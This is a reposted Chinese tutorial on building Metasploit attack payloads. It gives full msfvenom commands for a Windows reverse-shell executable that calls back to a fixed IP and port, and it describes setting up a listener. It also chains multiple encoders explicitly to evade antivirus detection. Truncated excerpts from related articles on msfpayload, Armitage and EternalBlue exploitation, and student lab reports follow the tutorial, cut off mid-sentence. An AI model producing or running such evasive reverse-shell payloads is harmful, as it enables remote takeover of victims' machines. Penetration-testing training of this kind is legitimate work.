MSF攻击载荷的生成

1、查看该模块的可用参数

msfvenom -p windows/shell_reverse_tcp --list-options

2、生成攻击载荷

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe
其中:
-f 表示输出格式
-o 表示保存payload为一个文件

3、接下来在MSF终端启动一个监听器

载入multi/handler模块
设置攻击载荷为windows反弹shell,用来匹配我们先前创建的可执行文件,并指定模块监听的IP地址,以及监听端口

4、通过MSF编码器躲避杀毒软件的检测
msfvenom --list encoders
显示当前框架中支持的编码器种类

5、在生成攻击载荷时加入编码器

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -e x64/xor -f exe -o payload2.exe

通过-e选项,加入编码器

6、多重编码

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a -x86 --platform windows -i 10 -f exe -o payload3.exe

原文地址:https://www.cnblogs.com/lw-monster/p/11773376.html

时间: 2024-10-12 16:50:08

MSF攻击载荷的生成的相关文章

metasploit攻击载荷独立封装和编码

封装攻击载荷msfpayload:Usage:msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>Summary:summary and optons of payloadC:C languagePerl:PerlRuby:RubyRaw:Raw,allows payload t

msf下的各种生成payload命令

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of th

Metasploit基础

1.专业术语 1.1   渗透攻击(exploit) 1.2   攻击载荷(payload) 1.3   shellcode 1.4   模块(Module) 1.5   监听器(Listener) 2.Metasploit用户接口 2.1   MSF终端 2.2   MSF命令行 2.3   Armitage 3.Metasploit功能程序 3.1   MSF攻击载荷生成器 3.2   MSF编码器 3.3   Nasm Shell 4.Metasploit Exploit和metasplo

基于Armitage的MSF自动化漏洞攻击实践

基于Armitage的MSF自动化漏洞攻击实践 目录 实践环境 预备知识 Armitage基础配置 ms08_067_netapi:自动化漏洞溢出攻击实践 ms14_064_ole_code_execution:IE漏洞自动化攻击实践 ms17_010_eternalblue:"永恒之蓝"自动化攻击实践 office_ms17_11882:Office漏洞自动化攻击实践 John the Ripper_linux口令破解模块:Armitage下Auxiliary辅助模块应用 实践中遇到

MSF基础攻击实践报告

MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果.常见的有内存溢出,网站程序漏洞利用,配置错误exploit. exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出.主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针 对目标主机被动的监听然后获得相应的操作. Exploit共分为

20145234黄斐《网络对抗技术》实验五,MSF基础应用

概述 MSF的六种模块 Exploit模块 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件. 形象点来说就是攻击模块 Payload模块 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接.实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码. Encoder模块 针对payload进行编码,可以通过多种编码手段.多次编码方式有效的改变payloa

20145326蔡馨熤《网络对抗》——MSF基础应用

20145326蔡馨熤<网络对抗>--MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机. payload:其实就是指装载的"具体内容".就相当于shellcode一样. encode:对需要传输的文件进行编码,使其达到免杀效果. 实验总结与体会 通过这次MSF基础应用的实验.我对MSF里面包括的6个模块都有了一定的认识,先是exploit模块,也就是我们说的渗透模块,包括主

20145309李昊《网络对抗》MSF应用基础

实验内容 掌握metasploit的基本应用方式1.主动攻击--ms08_0672.针对浏览器的攻击--ms11_0503.针对客户端的攻击--Adobe4.成功应用一个辅助模块--scanner/discovery/arp_sweep&scanner/http/cert 实验问题回答 1.exploit就是发起渗透攻击,当你可以获得靶机shell或者做夺权的准备之后的一个run.2.payload就是我们在做渗透攻击中用到的shellcode,可以破坏程序正常运行的代码.3.encode就是伪

20145306 《网络攻防》 MSF基础应用

20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入msfconsole. 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块;  使用命令set payload windows/meterpreter/reverse_tcp设置攻击载荷;设置端口,主机ip,产生pdf文件名. show